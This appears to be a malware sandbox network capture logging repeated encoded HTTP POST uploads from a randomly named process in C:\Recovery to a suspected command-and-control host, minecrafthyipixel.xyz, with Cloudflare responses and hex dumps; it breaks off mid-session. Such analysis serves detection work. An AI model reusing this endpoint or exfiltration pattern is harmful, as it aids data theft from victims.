                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:20.121553898 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                    73  192.168.2.4  49822  104.21.57.61  80  6756  C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                    Apr 19, 2024 13:43:21.496856928 CEST  386  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:21.600912094 CEST  25  IN  HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:21.601655006 CEST  2192  OUT  Data Raw: 52 5f 5e 5e 59 41 54 5e 5c 5e 59 59 57 5f 58 5a 54 54 5f 59 54 55 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R_^^YAT^\^YYW_XZTT_YTUSY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2-*V6;$$])T?8&9 %;&V#">=7 ^-$[. X
                                                                                                                                    Apr 19, 2024 13:43:21.959948063 CEST  770  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:21 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ays6EGx4%2Bd9CIdk31KSTaVg9tyPhsfMvoFXG06EcrjVGu%2F4VX2k5iqoof%2BTg1jIUQZw342HuRjw59aMg6EFp14mF4jRfRLLS1q2oUQoe9XW8x8kOPp7Wsp%2FFDIkj7bVx2pGukktsMpA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2efbdf953fa-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 5d 30 18 0f 04 20 39 30 05 3e 23 0c 11 3d 37 2a 03 2a 07 3a 02 22 2d 23 0c 3b 04 38 12 3c 3b 21 07 25 33 3e 0f 24 13 06 52 32 30 21 59 00 1a 39 5c 37 3c 29 5d 2e 2a 2d 1c 3c 1f 3d 5b 21 32 27 5f 3c 3e 0f 17 21 3b 23 5a 3f 3e 0f 15 3b 16 3c 1a 3f 01 29 5c 2f 51 29 04 22 11 2c 52 09 12 25 18 3f 38 34 12 25 20 29 12 34 08 3c 13 3f 3c 35 05 30 05 2b 09 32 0a 24 5b 2d 31 3a 57 31 3d 25 1d 29 03 2c 57 34 3c 0b 1b 25 14 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$]0 90>#=7**:"-#;8<;!%3>$R20!Y9\7<)].*-<=[!2'_<>!;#Z?>;<?)\/Q)",R%?84% )4<?<50+2$[-1:W1=%),W4<%.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:43:21.960011959 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                    74  192.168.2.4  49823  104.21.57.61  80  6756  C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                    Apr 19, 2024 13:43:21.699758053 CEST  362  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:21.804003954 CEST  25  IN  HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:21.804621935 CEST  2512  OUT  Data Raw: 57 59 5e 5a 5c 41 51 59 5c 5e 59 59 57 51 58 5a 54 53 5f 5f 54 5f 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^Z\AQY\^YYWQXZTS__T_S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\&.!!+$& 7^'1Q=+$1?&2V7)+;^7#:$[. X =
                                                                                                                                    Apr 19, 2024 13:43:22.063930035 CEST  635  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:22 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2B%2FKP2%2FJCRYJdwC0yniIkbsATzNSkRUFFafgZz5lM%2BjwQgz8YTK000O%2FAp%2BhX6t5x7c5VFVVUVT7FbXdUq20p%2BvI4FLt53dbuQ7Usm%2BEt3Tpk0O3HxxFE%2Bo%2B7JgPn4nEDGcZ8bH%2Fe6s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2f0fc104581-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:22.063992977 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                    75  192.168.2.4  49824  104.21.57.61  80  6756  C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                    Apr 19, 2024 13:43:22.304667950 CEST  362  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:22.410727978 CEST  25  IN  HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:22.411061049 CEST  2512  OUT  Data Raw: 57 54 5b 5b 59 42 51 5d 5c 5e 59 59 57 54 58 5c 54 50 5f 57 54 5a 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT[[YBQ]\^YYWTX\TP_WTZSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_16S68]'0'$1=7^2%+=425>#,]-%$[. X )
                                                                                                                                    Apr 19, 2024 13:43:22.661670923 CEST  619  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:22 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=07f7XG0ly9JTHR9TWXb8oKPgQ9cw2dGdUdc2lLjTvZz1ldgursszTs7Vms017eoLmb4tcCCf%2Bsa6EWiWz7aTZTZba4N7QjI1Wi2rC8kTs7QiJp4ijX1mf1oZa6kqj%2BO%2BA6Uv6WGuBT8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2f4bef844dd-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:22.661731005 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                    76  192.168.2.4  49825  104.21.57.61  80  6756  C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                    Apr 19, 2024 13:43:22.890170097 CEST  386  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:22.994653940 CEST  25  IN  HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:22.994837046 CEST  2512  OUT  Data Raw: 52 5a 5e 54 5c 46 54 59 5c 5e 59 59 57 53 58 5c 54 53 5f 59 54 55 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^T\FTY\^YYWSX\TS_YTUS^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]2.!!(\$?3-V*+7_'9 W&) ");;\#?$_-$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:23.374227047 CEST  619  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:23 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=772ewsob7%2Bya0x0czUxknqj18JmvqTxqRR9RYu7Tb49uuYBWAZkIcOBaNI9nnZRgjPEdQOmq5h84PNycKU2%2FC9ex8Bxd2mgkCxilbIPN8tVARx2pDyvVBPbgjusK1k0QNdz%2FiwKkBTc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2f8697953f8-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:23.374291897 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                    77  192.168.2.4  49826  104.21.57.61  80  6756  C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                    Apr 19, 2024 13:43:23.594894886 CEST  386  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:23.699462891 CEST  25  IN  HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:23.699786901 CEST  2512  OUT  Data Raw: 57 5e 5e 58 5c 41 51 5f 5c 5e 59 59 57 54 58 5e 54 54 5f 57 54 5e 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^X\AQ_\^YYWTX^TT_WT^SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_&.T ;/$'85=^'2)(W$+2Q75=;'[#/?.5$[. X )
                                                                                                                                    Apr 19, 2024 13:43:23.961651087 CEST  619  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:23 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MNMGTKahO62PraCR7Za2Bry7xfn5CXi61cZbcUOGl7ke7XJx3%2B5uoxwOCuuQnFok44WsRYlp8zX76rmGAFs6B2i8bIn%2BcDn%2Fh5pKGHujDiCOqMkPUDGwynQWNEHltyhBfqiLGlr4fSA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2fcceee12e5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:23.961683989 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    78 | 192.168.2.4 | 49827 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:24.196310997 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:24.300519943 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:24.300656080 CEST | 2512 | OUT | Data Raw: 57 5c 5e 5d 5c 40 54 5f 5c 5e 59 59 57 5e 58 5a 54 5a 5f 5b 54 5f 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^]\@T_\^YYW^XZTZ_[T_S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z%%";8&03Z'+1V=(X2*0&;V7*U+(4",^95$[. X
                                                                                                                                    Apr 19, 2024 13:43:24.563003063 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:24 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SK5ppyhK3NEB8R4Wj66B7nQlXUloxu47k%2B2e7UKyLdVRKyreJPgapRfpnNTM0owQDOB1lxWTr17UKzJ9ixnagSokQhBVvTz1VMKSIoxkRbE91KRYqv7VKhcuk%2BoT1Bjp7BNZaFRXcZE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca30099b1b074-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:24.563035011 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    79 | 192.168.2.4 | 49828 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:24.788753033 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:24.893532991 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:24.893687010 CEST | 2504 | OUT | Data Raw: 57 54 5b 5b 59 46 54 5c 5c 5e 59 59 57 57 58 5f 54 5a 5f 59 54 5d 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT[[YFT\\^YYWWX_TZ_YT]S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%>5?0 3]==?_'9<T2;&#V)](#/'-$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:25.153681040 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:25 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cmUoFeKtSQTeWHydF12pEAqil%2BqimMXrvLOd3f1x6Qvg2sfPKTp04qgnBll0eazoliVyMEZHyILZ2jfIpB%2Bm0lkkLvysjMxafV5yCpAgaLJNJThJ%2BzrNl4K7Ml3NrzyBAzMh2cdmAB8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca304486eadb2-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:25.153712988 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    80 | 192.168.2.4 | 49829 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:25.375885010 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:25.480175018 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:25.480331898 CEST | 2512 | OUT | Data Raw: 52 59 5b 5c 59 40 51 5e 5c 5e 59 59 57 55 58 52 54 54 5f 56 54 5a 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY[\Y@Q^\^YYWUXRTT_VTZS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1>W6'['81><%8%*Q41!>? (_:%$[. X -
                                                                                                                                    Apr 19, 2024 13:43:25.832961082 CEST | 633 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:25 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Byov4pGUAg3E2DyJqct4u8%2Fwfy%2BEX20Oo%2FsFZUfnCTrDFIm3qC3n7PzS%2B%2BPytYvNRK%2FttfF81%2B9dY0X3xeuNHoc3%2BFa%2BuE37q%2FVTNSzOC8L1OGNAvSavof4t1ZxFtUmSzPmH8kTI5Ao%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca307e9f3ad62-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:25.833009005 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    81 | 192.168.2.4 | 49830 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:26.062659979 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:26.167437077 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:26.167572975 CEST | 2512 | OUT | Data Raw: 52 5a 5e 5d 59 43 54 5c 5c 5e 59 59 57 51 58 5b 54 55 5f 59 54 54 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
